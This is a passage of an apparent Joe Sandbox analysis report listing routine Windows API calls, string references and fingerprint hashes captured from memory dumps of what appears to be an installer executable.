                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                            • API String ID: 142928637-2676053874
                                                            • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                            • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                            • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                            • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                            • API String ID: 2238633743-1050967733
                                                            • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                            • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                            • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                            • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                            • API String ID: 667068680-222143506
                                                            • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                            • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                            • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                            • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                            APIs
                                                            • GetFocus.USER32 ref: 0041B58E
                                                            • 73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                            • 73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                            • 73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                            • 73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                            • 73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: E680$A4620A480A570Focus
                                                            • String ID:
                                                            • API String ID: 2226671993-0
                                                            • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                            • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                            • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                            • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                            APIs
                                                            • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                            • API String ID: 1452528299-1580325520
                                                            • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                            • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                            • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                            • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                            • 73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                            • 73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                            • 73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                            • 73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A4620MetricsSystem$A480A570
                                                            • String ID:
                                                            • API String ID: 4120540252-0
                                                            • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                            • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                            • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                            • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$Show
                                                            • String ID:
                                                            • API String ID: 3609083571-0
                                                            • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                            • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                            • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                            • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                            APIs
                                                              • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                            • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                            • String ID:
                                                            • API String ID: 3527656728-0
                                                            • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                            • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                            • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                            • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                            APIs
                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                            • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                              • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                              • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                            • API String ID: 3312786188-1660910688
                                                            • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                            • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                            • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                            • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                            • API String ID: 828529508-2866557904
                                                            • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                            • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                            • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                            • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021C5E48,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID: Ub
                                                            • API String ID: 730355536-2151759353
                                                            • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                            • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                            • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                            • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                            • API String ID: 2573145106-3235461205
                                                            • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                            • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                            • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                            • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                            • API String ID: 3478007392-2498399450
                                                            • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                            • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                            • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                            • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                            APIs
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                            • API String ID: 1782028327-3855017861
                                                            • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                            • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                            • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                            • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                            APIs
                                                            • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                            • SaveDC.GDI32(?), ref: 00416C93
                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                            • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                            • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                            • String ID:
                                                            • API String ID: 3808407030-0
                                                            • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                            • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                            • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                            • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
